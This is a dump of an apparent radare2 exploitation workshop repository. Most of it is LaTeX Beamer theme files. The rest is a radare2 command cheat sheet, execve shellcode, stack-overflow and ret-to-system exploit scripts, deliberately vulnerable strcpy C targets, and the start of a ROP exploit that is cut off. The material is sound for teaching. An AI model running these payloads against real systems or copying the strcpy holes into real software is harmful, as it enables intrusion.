{\def\insertsectionhead{\hyperlink{Navigation\the\c@page}{#1}}} 76 | {\def\insertsectionhead{\hyperlink{Navigation\the\c@page}{\@metropolis@sectiontitleformat{#1}}}} 77 | {} 78 | {\PackageError{beamerinnerthememetropolis}{Patching section title failed.}} 79 | \setbeamertemplate{title page}{ 80 | \begin{minipage}[b][\paperheight]{\textwidth} 81 | \ifx\inserttitlegraphic\@empty\else\usebeamertemplate*{title graphic}\fi 82 | \vfill% 83 | \ifx\inserttitle\@empty\else\usebeamertemplate*{title}\fi 84 | \ifx\insertsubtitle\@empty\else\usebeamertemplate*{subtitle}\fi 85 | \usebeamertemplate*{title separator} 86 | \ifx\beamer@shortauthor\@empty\else\usebeamertemplate*{author}\fi 87 | \ifx\insertdate\@empty\else\usebeamertemplate*{date}\fi 88 | \ifx\insertinstitute\@empty\else\usebeamertemplate*{institute}\fi 89 | \vfill 90 | \vspace*{1mm} 91 | \end{minipage} 92 | } 93 | \def\maketitle{% 94 | \ifbeamer@inframe 95 | \titlepage 96 | \else 97 | \frame[plain]{\titlepage} 98 | \fi 99 | } 100 | \def\titlepage{% 101 | \usebeamertemplate{title page} 102 | } 103 | \setbeamertemplate{title graphic}{ 104 | \vbox to 0pt { 105 | \vspace*{2em} 106 | \inserttitlegraphic% 107 | }% 108 | \nointerlineskip% 109 | } 110 | \setbeamertemplate{title}{ 111 | \raggedright% 112 | \linespread{1.0}% 113 | \@metropolis@titleformat{\inserttitle}% 114 | \par% 115 | \vspace*{0.5em} 116 | } 117 | \setbeamertemplate{subtitle}{ 118 | \insertsubtitle% 119 | \par% 120 | \vspace*{0.5em} 121 | } 122 | \setbeamertemplate{title separator}{ 123 | \begin{tikzpicture} 124 | \draw[fg] (0, 0) -- (\textwidth, 0); 125 | \end{tikzpicture}% 126 | \par% 127 | } 128 | \setbeamertemplate{author}{ 129 | \vspace*{2em} 130 | \insertauthor% 131 | \par% 132 | \vspace*{0.25em} 133 | } 134 | \setbeamertemplate{date}{ 135 | \insertdate% 136 | \par% 137 | } 138 | \setbeamertemplate{institute}{ 139 | \vspace*{3mm} 140 | \insertinstitute% 141 | \par% 142 | } 143 | \newcommand{\@metropolis@sectionpage@none}{ 144 | \AtBeginSection{ 145 | % 
intenionally empty 146 | } 147 | } 148 | \defbeamertemplate{section page}{progressbar}{ 149 | \centering 150 | \begin{minipage}{22em} 151 | \usebeamercolor[fg]{section title} 152 | \usebeamerfont{section title} 153 | \insertsectionhead\\[-1ex] 154 | \usebeamertemplate*{progress bar in section page} 155 | \end{minipage} 156 | \par 157 | } 158 | \newcommand{\@metropolis@sectionpage@progressbar}{ 159 | \setbeamertemplate{section page}[progressbar] 160 | \AtBeginSection{ 161 | \ifbeamer@inframe 162 | \sectionpage 163 | \else 164 | \frame[plain,c]{\sectionpage} 165 | \fi 166 | } 167 | } 168 | \newlength{\metropolis@progressonsectionpage} 169 | \setbeamertemplate{progress bar in section page}{ 170 | \setlength{\metropolis@progressonsectionpage}{% 171 | \textwidth * \ratio{\insertframenumber pt}{\inserttotalframenumber pt}% 172 | }% 173 | \begin{tikzpicture} 174 | \draw[bg, fill=bg] (0,0) rectangle (\textwidth, 0.4pt); 175 | \draw[fg, fill=fg] (0,0) rectangle (\metropolis@progressonsectionpage, 0.4pt); 176 | \end{tikzpicture}% 177 | } 178 | \def\inserttotalframenumber{100} 179 | \newlength{\@metropolis@blockskip} 180 | \setbeamertemplate{block begin}{% 181 | \vspace*{1ex} 182 | \begin{beamercolorbox}[% 183 | ht=2.4ex, 184 | dp=1ex, 185 | leftskip=\@metropolis@blockskip, 186 | rightskip=\@metropolis@blockskip]{block title} 187 | \usebeamerfont*{block title}\insertblocktitle% 188 | \end{beamercolorbox}% 189 | \vspace*{-1pt} 190 | \usebeamerfont{block body}% 191 | \begin{beamercolorbox}[% 192 | dp=1ex, 193 | leftskip=\@metropolis@blockskip, 194 | rightskip=\@metropolis@blockskip, 195 | vmode]{block body}% 196 | } 197 | \setbeamertemplate{block end}{% 198 | \end{beamercolorbox} 199 | \vspace*{0.2ex} 200 | } 201 | \setbeamertemplate{block alerted begin}{% 202 | \vspace*{1ex} 203 | \begin{beamercolorbox}[% 204 | ht=2.4ex, 205 | dp=1ex, 206 | leftskip=\@metropolis@blockskip, 207 | rightskip=\@metropolis@blockskip]{block title alerted} 208 | \usebeamerfont*{block title 
alerted}\insertblocktitle% 209 | \end{beamercolorbox}% 210 | \vspace*{-1pt} 211 | \usebeamerfont{block body alerted}% 212 | \begin{beamercolorbox}[% 213 | dp=1ex, 214 | leftskip=\@metropolis@blockskip, 215 | rightskip=\@metropolis@blockskip, 216 | vmode]{block body}% 217 | } 218 | \setbeamertemplate{block alerted end}{% 219 | \end{beamercolorbox} 220 | \vspace*{0.2ex} 221 | } 222 | \setbeamertemplate{block example begin}{% 223 | \vspace*{1ex} 224 | \begin{beamercolorbox}[% 225 | ht=2.4ex, 226 | dp=1ex, 227 | leftskip=\@metropolis@blockskip, 228 | rightskip=\@metropolis@blockskip]{block title example} 229 | \usebeamerfont*{block title example}\insertblocktitle% 230 | \end{beamercolorbox}% 231 | \vspace*{-1pt} 232 | \usebeamerfont{block body example}% 233 | \begin{beamercolorbox}[% 234 | dp=1ex, 235 | leftskip=\@metropolis@blockskip, 236 | rightskip=\@metropolis@blockskip, 237 | vmode]{block body}% 238 | } 239 | \setbeamertemplate{block example end}{% 240 | \end{beamercolorbox} 241 | \vspace*{0.2ex} 242 | } 243 | \setbeamertemplate{itemize items}{\textbullet} 244 | \setbeamertemplate{caption label separator}{: } 245 | \setbeamertemplate{caption}[numbered] 246 | \setbeamertemplate{footnote}{% 247 | \parindent 0em\noindent% 248 | \raggedright 249 | \usebeamercolor{footnote}\hbox to 0.8em{\hfil\insertfootnotemark}\insertfootnotetext\par% 250 | } 251 | \setlength{\parskip}{0.5em} 252 | \linespread{1.15} 253 | \define@key{beamerframe}{c}[true]{% centered 254 | \beamer@frametopskip=0pt plus 1fill\relax% 255 | \beamer@framebottomskip=0pt plus 1fill\relax% 256 | \beamer@frametopskipautobreak=0pt plus .4\paperheight\relax% 257 | \beamer@framebottomskipautobreak=0pt plus .6\paperheight\relax% 258 | \def\beamer@initfirstlineunskip{}% 259 | } 260 | \@metropolis@inner@setdefaults 261 | \ProcessPgfPackageOptions{/metropolis/inner} 262 | \endinput 263 | %% 264 | %% End of file `beamerinnerthememetropolis.sty'. 
265 | -------------------------------------------------------------------------------- /beamerouterthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerouterthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerouterthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerouterthememetropolis}[2015/06/12 Metropolis outer theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{calc} 23 | \RequirePackage{pgfopts} 24 | \pgfkeys{ 25 | /metropolis/outer/numbering/.cd, 26 | .is choice, 27 | none/.code=\setbeamertemplate{frame numbering}[none], 28 | counter/.code=\setbeamertemplate{frame numbering}[counter], 29 | fraction/.code=\setbeamertemplate{frame numbering}[fraction], 30 | } 31 | \pgfkeys{ 32 | /metropolis/outer/progressbar/.cd, 33 | .is choice, 34 | none/.code={% 35 | \setbeamertemplate{headline}[plain] 36 | \setbeamertemplate{frametitle}[plain] 37 | \setbeamertemplate{footline}[plain] 38 | }, 39 | head/.code={\pgfkeys{/metropolis/outer/progressbar=none} 40 | \addtobeamertemplate{headline}{}{\usebeamertemplate*{progress bar in head/foot}} 41 | }, 42 | frametitle/.code={\pgfkeys{/metropolis/outer/progressbar=none} 43 | 
\addtobeamertemplate{frametitle}{}{\usebeamertemplate*{progress bar in head/foot}} 44 | }, 45 | foot/.code={\pgfkeys{/metropolis/outer/progressbar=none} 46 | \addtobeamertemplate{footline}{}{\usebeamertemplate*{progress bar in head/foot}} 47 | }, 48 | } 49 | \pgfkeys{ 50 | /metropolis/outer/frametitleformat/.cd, 51 | .is choice, 52 | regular/.code={% 53 | \renewcommand{\@metropolis@frametitleformat}{}% 54 | \renewcommand{\@metropolis@frametitlestrut}{% 55 | \rule{0pt}{\heightof{ABCDEFGHIJKLMNOPQRSTUVWXYZ}} 56 | } 57 | }, 58 | lowercase/.code={% 59 | \renewcommand{\@metropolis@frametitleformat}{\MakeLowercase}% 60 | \renewcommand{\@metropolis@frametitlestrut}{% 61 | \rule{0pt}{\heightof{abcdefghijklmnopqrstuvwxyz}} 62 | } 63 | }, 64 | uppercase/.code={% 65 | \renewcommand{\@metropolis@frametitleformat}{\MakeUppercase}% 66 | \renewcommand{\@metropolis@frametitlestrut}{% 67 | \rule{0pt}{\heightof{ABCDEFGHIJKLMNOPQRSTUVWXYZ}} 68 | } 69 | }, 70 | } 71 | \newcommand{\@metropolis@outer@setdefaults}{ 72 | \pgfkeys{/metropolis/outer/.cd, 73 | numbering=counter, 74 | progressbar=none, 75 | frametitleformat=lowercase, 76 | } 77 | } 78 | \setbeamertemplate{navigation symbols}{} 79 | \defbeamertemplate{frame numbering}{none}{} 80 | \defbeamertemplate{frame numbering}{counter}{\insertframenumber} 81 | \defbeamertemplate{frame numbering}{fraction}{ 82 | \insertframenumber/\inserttotalframenumber 83 | } 84 | \defbeamertemplate{headline}{plain}{} 85 | \defbeamertemplate{footline}{plain}{% 86 | \begin{beamercolorbox}[wd=\textwidth, sep=3ex]{footline}% 87 | \hfill% 88 | \usebeamerfont{page number in head/foot}% 89 | \usebeamertemplate*{frame numbering} 90 | \end{beamercolorbox}% 91 | } 92 | \def\@metropolis@frametitleformat#1{#1} 93 | \patchcmd{\beamer@@frametitle} 94 | {\beamer@ifempty{#2}{}{% 95 | \gdef\insertframetitle{{#2\ifnum\beamer@autobreakcount>0\relax{}\space\usebeamertemplate*{frametitle continuation}\fi}}% 96 | \gdef\beamer@frametitle{#2}% 97 | 
\gdef\beamer@shortframetitle{#1}% 98 | }} 99 | {\beamer@ifempty{#2}{}{% 100 | \gdef\insertframetitle{{\@metropolis@frametitleformat{#2}\ifnum\beamer@autobreakcount>0\relax{}\space\usebeamertemplate*{frametitle continuation}\fi}}% 101 | \gdef\beamer@frametitle{#2}% 102 | \gdef\beamer@shortframetitle{#1}% 103 | }} 104 | {} 105 | {\PackageError{beamerouterthememetropolis}{Patching frame title failed.}} 106 | \newlength{\@metropolis@frametitlestrut} 107 | \defbeamertemplate{frametitle}{plain}{% 108 | \nointerlineskip% 109 | \begin{beamercolorbox}[% 110 | wd=\paperwidth,% 111 | sep=1.5ex,% 112 | ]{frametitle}% 113 | \@metropolis@frametitlestrut\insertframetitle\@metropolis@frametitlestrut% 114 | \end{beamercolorbox}% 115 | } 116 | \newlength{\metropolis@progressinheadfoot} 117 | \setbeamertemplate{progress bar in head/foot}{ 118 | \nointerlineskip 119 | \setlength{\metropolis@progressinheadfoot}{% 120 | \paperwidth * \ratio{\insertframenumber pt}{\inserttotalframenumber pt}% 121 | }% 122 | \begin{beamercolorbox}[wd=\paperwidth]{progress bar in head/foot} 123 | \begin{tikzpicture} 124 | \draw[bg, fill=bg] (0,0) rectangle (\paperwidth, 0.4pt); 125 | \draw[fg, fill=fg] (0,0) rectangle (\metropolis@progressinheadfoot, 0.4pt); 126 | \end{tikzpicture}% 127 | \end{beamercolorbox} 128 | } 129 | \@metropolis@outer@setdefaults 130 | \ProcessPgfPackageOptions{/metropolis/outer} 131 | \endinput 132 | %% 133 | %% End of file `beamerouterthememetropolis.sty'. 134 | -------------------------------------------------------------------------------- /beamerthemem.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerthemem.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerthemem.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. 
A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerthemem}[2015/06/12 Metropolis Beamer theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{pgfopts} 23 | \RequirePackage{ifxetex} 24 | \RequirePackage{ifluatex} 25 | \newcommand{\metroset}[1]{\pgfkeys{/metropolis/.cd,#1}} 26 | \pgfkeys{/metropolis/.cd, 27 | .search also={ 28 | /metropolis/inner, 29 | /metropolis/outer, 30 | /metropolis/color, 31 | }, 32 | block/.code=\pgfkeysalso{ 33 | inner/block=#1, 34 | color/block=#1, 35 | }, 36 | } 37 | \pgfkeys{ 38 | /metropolis/plaintitleformat/.cd, 39 | .is choice, 40 | regular/.code=\renewcommand{\@metropolis@plaintitleformat}{#1}, 41 | lowercase/.code={% 42 | \renewcommand{\@metropolis@plaintitleformat}{\MakeLowercase{#1}} 43 | }, 44 | uppercase/.code={% 45 | \renewcommand{\@metropolis@plaintitleformat}{\MakeUppercase{#1}} 46 | }, 47 | } 48 | \pgfkeys{ 49 | /metropolis/everytitleformat/.code=\pgfkeysalso{ 50 | inner/titleformat=#1, 51 | inner/sectiontitleformat=#1, 52 | outer/frametitleformat=#1, 53 | plaintitleformat=#1, 54 | } 55 | } 56 | \pgfkeys{/metropolis/.cd, 57 | usetitleprogressbar/.code=\pgfkeysalso{outer/progressbar=frametitle}, 58 | noslidenumbers/.code=\pgfkeysalso{outer/numbering=none}, 59 | usetotalslideindicator/.code=\pgfkeysalso{outer/numbering=fraction}, 60 | nosectionslide/.code=\pgfkeysalso{inner/sectionpage=none}, 61 | darkcolors/.code=\pgfkeysalso{color/background=dark}, 62 | blockbg/.code=\pgfkeysalso{color/block=fill, inner/block=fill}, 63 | } 64 | 
\newcommand{\@metropolis@setdefaults}{ 65 | \pgfkeys{/metropolis/.cd, 66 | plaintitleformat=lowercase, 67 | } 68 | } 69 | \useinnertheme{metropolis} 70 | \useoutertheme{metropolis} 71 | \usecolortheme{metropolis} 72 | \ifboolexpr{bool {xetex} or bool {luatex}}{ 73 | \usefonttheme{metropolis} 74 | }{ 75 | \PackageWarning{beamerthemem}{% 76 | You need to compile with XeLaTeX or LuaLaTeX to use the Fira fonts. 77 | } 78 | } 79 | \AtEndPreamble{% 80 | \@ifpackageloaded{pgfplots}{% 81 | \RequirePackage{pgfplotsthemetol} 82 | }{} 83 | } 84 | \def\@metropolis@plaintitleformat#1{#1} 85 | \newcommand{\plain}[2][]{% 86 | \begingroup 87 | \setbeamercolor{background canvas}{ 88 | use=palette primary, 89 | parent=palette primary 90 | } 91 | \begin{frame}[c]{#1} 92 | \begin{center} 93 | \usebeamercolor[fg]{palette primary} 94 | \usebeamerfont{section title} 95 | \@metropolis@plaintitleformat{#2} 96 | \end{center} 97 | \end{frame} 98 | \endgroup 99 | } 100 | \newcommand{\mreducelistspacing}{\vspace{-\topsep}} 101 | \@metropolis@setdefaults 102 | \ProcessPgfOptions{/metropolis} 103 | \endinput 104 | %% 105 | %% End of file `beamerthemem.sty'. 106 | -------------------------------------------------------------------------------- /ccicons.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `ccicons.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% ccicons.dtx (with options: `package') 8 | %% 9 | %% This is a generated file. 10 | %% 11 | %% Copyright (C) 2012 by Michael Ummels 12 | %% 13 | %% This work may be distributed and/or modified under the 14 | %% conditions of the LaTeX Project Public License, either version 1.3c 15 | %% of this license or (at your option) any later version. 
16 | %% The latest version of this license is in 17 | %% http://www.latex-project.org/lppl.txt 18 | %% and version 1.3 or later is part of all distributions of LaTeX 19 | %% version 2005/12/01 or later. 20 | %% 21 | %% This work has the LPPL maintenance status `maintained'. 22 | %% 23 | %% The Current Maintainer of this work is Michael Ummels. 24 | %% 25 | %% This work consists of the files ccicons.dtx, ccicons.ins, 26 | %% ccicons.map, ccicons.pfb, ccicons.tfm, ccicons-u.enc and 27 | %% the derived files ccicons.pdf and ccicons.sty. 28 | %% 29 | %% The files ccicons.pfb and ccicons.tfm have been generated from the 30 | %% file cc-icons-svg.zip available from 31 | %% http://mirrors.creativecommons.org/presskit/icons/cc-icons-svg.zip 32 | %% and released by Creative Commons under the Creative Commons Attribution 33 | %% 3.0 Unported License: http://creativecommons.org/licenses/by/3.0/ 34 | %% 35 | \NeedsTeXFormat{LaTeX2e}[1999/12/01] 36 | \ProvidesPackage{ccicons}[2012/05/22 v1.4 LaTeX support for Creative Commons icons] 37 | \RequirePackage{xkeyval} 38 | \define@boolkey{ccicons.sty}[ccicons@]{copyright}[true]{} 39 | \newcommand{\ccicons@scale}{1.0} 40 | \define@key{ccicons.sty}{scale}{\renewcommand\ccicons@scale{#1}} 41 | \ProcessOptionsX 42 | \DeclareFontFamily{U}{ccicons}{} 43 | \DeclareFontShape{U}{ccicons}{m}{n}{ 44 | <-> s * [\ccicons@scale] ccicons 45 | }{} 46 | \newcommand{\ccicons@font}{\usefont{U}{ccicons}{m}{n}} 47 | \newcommand{\ccicons@logo}{\char0} 48 | \newcommand{\ccicons@by}{\char1} 49 | \newcommand{\ccicons@sa}{\char2} 50 | \newcommand{\ccicons@nd}{\char3} 51 | \newcommand{\ccicons@nc}{\char4} 52 | \newcommand{\ccicons@nceu}{\char5} 53 | \newcommand{\ccicons@ncjp}{\char6} 54 | \newcommand{\ccicons@pd}{\char7} 55 | \newcommand{\ccicons@zero}{\char8} 56 | \newcommand{\ccicons@sampling}{\char9} 57 | \newcommand{\ccicons@share}{\char10} 58 | \newcommand{\ccicons@remix}{\char11} 59 | \newcommand{\ccicons@copy}{\char12} 60 | 
\newcommand{\ccLogo}{{\ccicons@font\ccicons@logo}} 61 | \newcommand{\ccAttribution}{{\ccicons@font\ccicons@by}} 62 | \newcommand{\ccShareAlike}{{\ccicons@font\ccicons@sa}} 63 | \newcommand{\ccNoDerivatives}{{\ccicons@font\ccicons@nd}} 64 | \newcommand{\ccNonCommercial}{{\ccicons@font\ccicons@nc}} 65 | \newcommand{\ccNonCommercialEU}{{\ccicons@font\ccicons@nceu}} 66 | \newcommand{\ccNonCommercialJP}{{\ccicons@font\ccicons@ncjp}} 67 | \newcommand{\ccPublicDomain}{{\ccicons@font\ccicons@pd}} 68 | \newcommand{\ccZero}{{\ccicons@font\ccicons@zero}} 69 | \newcommand{\ccSampling}{{\ccicons@font\ccicons@sampling}} 70 | \newcommand{\ccShare}{{\ccicons@font\ccicons@share}} 71 | \newcommand{\ccRemix}{{\ccicons@font\ccicons@remix}} 72 | \newcommand{\ccCopy}{{\ccicons@font\ccicons@copy}} 73 | \ifccicons@copyright\renewcommand{\textcopyright}{\ccCopy}\fi 74 | \newcommand{\ccby}% 75 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by}} 76 | \newcommand{\ccbysa}% 77 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 78 | \kern0.1em\ccicons@sa}} 79 | \newcommand{\ccbynd}% 80 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 81 | \kern0.1em\ccicons@nd}} 82 | \newcommand{\ccbync}% 83 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 84 | \kern0.1em\ccicons@nc}} 85 | \newcommand{\ccbynceu}% 86 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 87 | \kern0.1em\ccicons@nceu}} 88 | \newcommand{\ccbyncjp}% 89 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 90 | \kern0.1em\ccicons@ncjp}} 91 | \newcommand{\ccbyncsa}% 92 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 93 | \kern0.1em\ccicons@nc\kern0.1em\ccicons@sa}} 94 | \newcommand{\ccbyncsaeu}% 95 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 96 | \kern0.1em\ccicons@nceu\kern0.1em\ccicons@sa}} 97 | \newcommand{\ccbyncsajp}% 98 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 99 | \kern0.1em\ccicons@ncjp\kern0.1em\ccicons@sa}} 100 | \newcommand{\ccbyncnd}% 101 | 
{\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 102 | \kern0.1em\ccicons@nc\kern0.1em\ccicons@nd}} 103 | \newcommand{\ccbyncndeu}% 104 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 105 | \kern0.1em\ccicons@nceu\kern0.1em\ccicons@nd}} 106 | \newcommand{\ccbyncndjp}% 107 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 108 | \kern0.1em\ccicons@ncjp\kern0.1em\ccicons@nd}} 109 | \newcommand{\cczero}% 110 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@zero}} 111 | \newcommand{\ccpd}% 112 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@pd}} 113 | %% 114 | %% 115 | %% End of file `ccicons.sty'. 116 | -------------------------------------------------------------------------------- /demos/Exploit/commands.md: -------------------------------------------------------------------------------- 1 | # ragg2 2 | ragg2 -P 300 -r : generate a De Bruijn Pattern of 300 chars 3 | ragg2 -a x86 -b 32 -i exec -z : generate a x86, 32 bits exec shellcode 4 | 5 | # rarun2 6 | r2 -b 32 -d rarun2 program=pwn1 arg1=$(ragg2 -P 300 -r) : runs pwn1 with a De Bruijn Pattern as first argument, inside radare2's debugger, and force 32 bits 7 | r2 -d rarun2 program=/bin/ls stdin=$(python exploit.py) : runs /bin/ls with the output of exploit.py directed to stdin 8 | 9 | # radiff2 10 | radiff2 -a x86 -b32 -C original patched : diff original and patched on x86_32, using graphdiff algorithm 11 | radiff2 -a x86 -b32 original patched : show differences between original and patched on x86_32 12 | 13 | # r2 14 | ## Analysis 15 | aa : analyse all 16 | afl : list all functions 17 | is : show symbols 18 | ## Debugger 19 | dr : show registers 20 | dc : continue 21 | dcu symbol : continue until symbol 22 | dm : display map 23 | ## Print 24 | pxw 8 @ sym.main : print hexdump grouped as word, on 8 bytes at offset sym.main 25 | pdf @ sym.main : print the disassembly of the sym.main function 26 | ## Mitigations 27 | i~pic : check if the binary has position-independent-code 28 | 
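i~nx : check if the binary has non-executable stack
i~canary : check if the binary has canaries
## Misc
/ pouet\x00 : search for the zero-terminated string "pouet"
woO 41424344 : get the index in the De Bruijn Pattern of the given word
/Rl jmp eax,call ebx : find ROP gadgets that match *;jmp eax;*;call ebx*;*

--------------------------------------------------------------------------------
/demos/Exploit/pwn1/exploit.py:
--------------------------------------------------------------------------------
import sys

# Total payload length: 76 bytes from the start of foo()'s buffer up to the
# saved return address, plus the 4-byte return address itself.
PAYLOAD_LEN = 76 + 4

# 24-byte x86-32 execve("/bin//sh") shellcode. It must stay free of NUL
# bytes: the payload travels through argv[1] and strcpy(), both of which
# stop at the first NUL.
shellcode = (b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e'
             b'\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')

# Overwritten return address: a `call eax` gadget at 0x080483b3. foo()
# returns strcpy()'s result -- the address of buff -- in EAX, so `call eax`
# lands on the shellcode at the start of the buffer; the exploit therefore
# never needs to know the stack address.
jmp = b'\xb3\x83\x04\x08'  # call eax


def build_payload(total_len=PAYLOAD_LEN, code=shellcode, ret=jmp):
    """Return code + 'A' filler + ret, exactly total_len bytes long.

    Raises ValueError when code and ret do not fit: the original script
    silently emitted a too-short payload in that case ('A' * negative == '').
    """
    filler = total_len - len(code) - len(ret)
    if filler < 0:
        raise ValueError('shellcode and return address exceed %d bytes' % total_len)
    return code + b'A' * filler + ret


if __name__ == '__main__':
    # Write raw bytes; print() would re-encode them as text on Python 3.
    out = getattr(sys.stdout, 'buffer', sys.stdout)
    out.write(build_payload() + b'\n')
--------------------------------------------------------------------------------
/demos/Exploit/pwn1/pwn1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/pwn1/pwn1
--------------------------------------------------------------------------------
/demos/Exploit/pwn1/pwn1.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>

/* Intentionally vulnerable workshop target -- the overflow is the exercise.
 * strcpy() copies attacker-controlled argv[1] into a 64-byte stack buffer
 * with no length check; exploit.py overwrites the saved return address
 * 76 bytes past the start of buff. The buff pointer is returned in EAX,
 * which is what the `call eax` gadget used by exploit.py relies on. */
char* foo(const char *b) {
    char buff[64];

    return strcpy(buff, b);   /* unbounded copy: the bug under study */
}

int main(int argc, char **argv) {
    if (argc > 1)
        printf("%p\n", foo(argv[1]));   /* prints the address of foo()'s dead buffer */

    return 0;
}
--------------------------------------------------------------------------------
/demos/Exploit/pwn2/exploit.py:
--------------------------------------------------------------------------------
import sys

# Bytes from the start of greet()'s 128-byte buffer to the saved return address.
RET_OFFSET = 140

# Address written over the saved return address. The original labels it
# "system"; whether it is pwn2's system_() wrapper or the system@plt stub is
# not visible from the script -- confirm with `afl` / `pdf`.
system = b'\xab\x84\x04\x08'

# Pointer passed as the first argument. Labelled "you" in the original;
# presumably it points at the trailing "you" of pwn2's "Nice ot meet you"
# string, so system("you") runs the `you` helper shipped next to the binary
# -- confirm with `iz`.
payload = b'\x37\x86\x04\x08'  # you


def build_payload(offset=RET_OFFSET, target=system, arg=payload):
    """Return filler + target + fake return address + first argument.

    The overflow replaces the saved EIP with `target`; `BBBB` is the return
    address target sees (never used cleanly) and `arg` sits where a cdecl
    callee expects its first parameter.
    """
    return b'C' * offset + target + b'BBBB' + arg


if __name__ == '__main__':
    # Write raw bytes; print() would re-encode them as text on Python 3.
    out = getattr(sys.stdout, 'buffer', sys.stdout)
    out.write(build_payload() + b'\n')
--------------------------------------------------------------------------------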
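/demos/Exploit/pwn2/pwn2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/pwn2/pwn2
--------------------------------------------------------------------------------
/demos/Exploit/pwn2/pwn2.c:
--------------------------------------------------------------------------------
#include   /* header name lost in extraction -- TODO restore from the repository */
#include   /* header name lost in extraction -- TODO restore from the repository */

/* Intentionally vulnerable workshop target (see exploit.py): the bugs below
 * are the exercise, not something to patch. */

/* Thin wrapper around system(3). exploit.py returns into an address it
 * labels "system" with one pointer argument; whether that is this wrapper
 * or the PLT stub is not visible here -- confirm with `afl`. */
void system_(const char* cmd){
    system(cmd);
}

/* Unbounded strcpy() of argv[1] into a 128-byte stack buffer. exploit.py
 * sends 140 bytes of filler before the value that replaces the saved
 * return address. */
void greet(char* cmd) {
    char buff[128];
    strcpy(buff, cmd);
    printf ("Greetings, %s\n", buff);
}

int main(int argc, char **argv) {
    if (argc > 1)
        greet (argv[1]);
    else
        /* Goes through a shell; $(...) expands to the current user name. */
        system_ ("/bin/echo 'Greetings, '$(/usr/bin/id -nu)");
    /* Keep this string byte-for-byte (typo included): its trailing "you" is
     * presumably what exploit.py's second pointer (commented "# you") refers
     * to, so that system("you") runs the `you` helper next to this file --
     * confirm with `iz`. */
    puts("Nice ot meet you");

    return 0;
}
--------------------------------------------------------------------------------
/demos/Exploit/pwn2/you:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/pwn2/you
--------------------------------------------------------------------------------
/demos/Exploit/ropasaurus/exploit1.py:
--------------------------------------------------------------------------------
import socket
import struct
import sys

# radare2 exploitation workshop
# Many thanks to crowell for helping me to write this
#
# Expects the ropasaurusrex service on 127.0.0.1:2323 and glibc offsets that
# match the *target's* libc build -- a leaked read() address combined with
# offsets from a different libc yields garbage and a crash, not a shell.
# (`import time` was dropped: nothing in this script used it.)


# This function handles endianness.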
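# Stolen from De Eindbazen
def rop(*args):
    """Pack 32-bit words into a ROP chain for the x86-32 target.

    Byte order and word size are pinned with '<' (little-endian, 4-byte
    unsigned). The original format 'I' used the host's native layout, which
    is only correct by coincidence on a little-endian host.
    """
    return struct.pack('<' + 'I' * len(args), *args)


def recv_exact(sock, n):
    """Read exactly n bytes from sock.

    recv(n) may legitimately return fewer bytes; feeding a short read to
    struct.unpack raises a confusing struct.error. Raises EOFError when the
    peer closes the connection before n bytes have arrived.
    """
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError('peer closed after %d of %d bytes' % (len(buf), n))
        buf += chunk
    return buf


# Fixed addresses in the non-PIE ropasaurusrex binary (see notes.md).
readplt = 0x804832c
writeplt = 0x804830c
read_got = 0x0804961c
vuln_func = 0x080483F4
write_addr = 0x08049530  # where we're going to write the command string
pop3ret = 0x080484b6     # pop; pop; pop; ret -- discards three call arguments

# glibc offsets of read(), system() and exit(). They belong to ONE specific
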